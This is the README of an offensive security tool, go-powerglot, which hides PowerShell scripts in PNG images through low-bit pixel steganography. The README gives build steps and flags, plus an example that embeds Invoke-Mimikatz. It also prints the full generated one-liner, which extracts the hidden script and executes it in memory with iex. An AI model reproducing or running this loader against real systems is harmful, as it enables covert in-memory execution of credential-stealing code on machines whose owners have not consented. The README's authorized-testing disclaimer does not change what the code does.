# go-powerglot
`go-powerglot` is an offensive security utility that embeds PowerShell scripts into PNG images using pixel-level steganography. It turns an ordinary PNG file into a covert script carrier and prints a one-line PowerShell payload that extracts the script from the image and executes it in memory. Inspired by [https://github.com/peewpw/Invoke-PSImage](https://github.com/peewpw/Invoke-PSImage).
> **WARNING**: This tool is intended for **authorized security assessments only**. Misuse may violate laws or regulations. The author disclaims any responsibility for unlawful use. Always obtain explicit permission before conducting any security tests.
## Features
- **Steganography**: Stores one script byte per pixel, writing the byte's high nibble into the low four bits of the red channel and its low nibble into the low four bits of the green channel (the layout the decoder snippet below reads back), so only the low bits of two channels change.
- **PowerShell Payload Generator**: Prints a one-liner that reads the pixels back, rebuilds the script in memory and executes it.
- **Portable**: Single binary with no dependencies beyond Go's standard library.
- **File Size & Dimension Checks**: Verifies that the image has enough pixels to hold the whole script before embedding; at one byte per pixel, width × height must be at least the script length in bytes.
## Installation
### Prerequisites
- **Go**: Version 1.21 or later.
- **Make**: For building with the provided Makefile.
- **Git**: To clone the repository.
### Steps
- Clone the repository:
```
$ git clone https://cgit.heqnx.com/go-powerglot
$ cd go-powerglot
```
- Install dependencies:
```
$ go mod tidy
```
- Build for all platforms:
```
$ make all
```
- Binaries are written to the `build/` directory for Linux, Windows and macOS; alternatively, build for a single platform:
```
$ make linux-amd64
$ make windows-amd64
$ make darwin-arm64
```
- (Optional) Run directly with Go:
```
$ go run main.go -exec </path/to/png> -image </path/to/input.png> -out </path/to/out.png> -script </path/to/input.ps1>
```
## Usage
### Command-Line Flags
```
Usage of ./go-powerglot:
  -exec string
        execution path to be used inside the generated PowerShell one-liner
  -image string
        input PNG file to embed the script into
  -out string
        output PNG file with embedded script
  -script string
        PowerShell script file to embed
```
## Examples
### Embed a PowerShell script into a PNG and generate a decoder
```
$ ./go-powerglot \
-image img/windows-11-5689x2400.png \
-script Invoke-Mimikatz.ps1 \
-out test.png \
-exec C:\Users\Public\test.png
```
- Example output:
```
[inf] script size: 3625037 bytes
[inf] image size: 2702073 bytes
[inf] png dimensions: 5689x2400
[inf] created output file: /home/heqnx/go-powerglot/test.png
[inf] successfully embedded Invoke-Mimikatz.ps1 into test.png
[inf] powershell decoder snippet:
sal a new-object;add-type -a system.drawing;$g=a system.drawing.bitmap("C:\Users\Public\test.png");$o=a byte[] 13653600;(0..2399)|%{foreach($x in 0..5688) {$p=$g.getpixel($x,$_);$o[$_*5689+$x]=[math]::floor(($p.r -band 0x0f)*16) + ($p.g -band 0x0f);}};$g.dispose();iex([system.text.encoding]::ascii.getstring($o[0..3625036]))
```
- The generated PowerShell snippet loads the output PNG with `System.Drawing`, walks the pixels row by row, reassembles one script byte per pixel from the low four bits of the red and green channels (`($p.r -band 0x0f)*16 + ($p.g -band 0x0f)`), truncates the buffer to the script length and executes the reconstructed text in memory with `iex`. The `-exec` value must therefore be the path where the PNG will reside when the one-liner runs.
## Disclaimer
`go-powerglot` is provided "as is" without any warranties. The author and contributors are not responsible for damages or misuse. This tool is for research and authorized red team operations only.
## License
This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the [LICENSE](LICENSE) file for more details.